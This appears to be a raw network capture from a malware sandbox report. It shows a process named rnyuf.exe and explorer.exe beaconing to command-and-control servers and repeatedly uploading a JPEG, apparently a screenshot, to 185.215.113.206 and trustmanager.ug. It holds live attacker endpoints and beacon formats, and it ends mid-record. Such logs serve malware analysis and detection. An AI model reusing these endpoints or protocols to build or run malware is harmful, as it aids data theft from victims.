Aug 23, 2021 02:09:16.147371054 CEST	18344	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: atvcampingtrips.com
Aug 23, 2021 02:09:16.147384882 CEST	18344	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 46 2a e7 fb Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuFR@Cc2d]EXf!iE5ZYTM\BY;3P{?UTqFz5z!3+!GqAiwsqOo+jK/
Aug 23, 2021 02:09:17.400588036 CEST	18387	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:16 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.3	49863	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:17.357276917 CEST	18347	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:17.357391119 CEST	18348	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:17.357574940 CEST	18358	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:17.357698917 CEST	18360	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:17.383371115 CEST	18364	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:17.383408070 CEST	18369	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:17.383475065 CEST	18381	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:17.383517981 CEST	18386	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:17.409265041 CEST	18393	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:17.409368992 CEST	18427	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
Aug 23, 2021 02:09:17.409414053 CEST	18429	OUT	Data Raw: f7 a0 62 15 b1 8d c3 d7 15 bb e0 dd 46 d7 4a f1 4d bd dd e5 c4 56 f0 ac 37 09 e6 cd 11 91 15 9e 17 55 dc a1 58 91 b9 86 46 0f d2 b0 28 ab 6a f1 b0 af ad ce 9a eb 56 4b 2b 0b ef 27 53 d3 ee 35 06 be b2 ba 81 f4 eb 46 82 2f dd 2c c0 e1 7c a8 c2 90 Data Ascii: bFJMV7UXF(jVK+'S5F/,\|Y?g9. +GhY<[J/NJ=);^=,_ggckevl\|Sa%Vd$F,d$FTz*5qc,3Is$p-2erk=)p=(ta{Kt;Y
Aug 23, 2021 02:09:17.461587906 CEST	18445	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.462582111 CEST	18445	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.3	49862	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:17.376360893 CEST	18361	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.206 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 31 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000021001&unit=152138533219
Aug 23, 2021 02:09:17.482781887 CEST	18447	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Aug 23, 2021 02:09:17.523211002 CEST	18447	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:17.523332119 CEST	18448	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:17.523576021 CEST	18458	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:17.523665905 CEST	18460	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:17.584882975 CEST	18463	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:17.584924936 CEST	18469	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:17.584939957 CEST	18471	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:17.585311890 CEST	18474	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:17.585525990 CEST	18477	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:17.585701942 CEST	18479	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:17.585820913 CEST	18482	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:17.818785906 CEST	18547	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Aug 23, 2021 02:09:18.258227110 CEST	18688	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----353468075b120103bc30cd6e79752b25 Host: 185.215.113.206 Content-Length: 94297 Cache-Control: no-cache
Aug 23, 2021 02:09:18.429909945 CEST	18841	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Aug 23, 2021 02:09:18.815666914 CEST	19289	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5 Host: 185.215.113.206 Content-Length: 98665 Cache-Control: no-cache
Aug 23, 2021 02:09:18.975770950 CEST	19465	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Aug 23, 2021 02:09:19.381596088 CEST	19572	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----6a7b7c2e2f57eb415274d4cc685decec Host: 185.215.113.206 Content-Length: 98735 Cache-Control: no-cache
Aug 23, 2021 02:09:19.491621017 CEST	19672	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Aug 23, 2021 02:09:19.818439960 CEST	19782	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5 Host: 185.215.113.206 Content-Length: 98665 Cache-Control: no-cache
Aug 23, 2021 02:09:19.929966927 CEST	19884	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.3	49864	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:17.747251987 CEST	18544	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: atvcampingtrips.com
Aug 23, 2021 02:09:17.747256994 CEST	18545	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 79 05 c3 bc Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuyp^n STq
Aug 23, 2021 02:09:18.671216965 CEST	18959	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 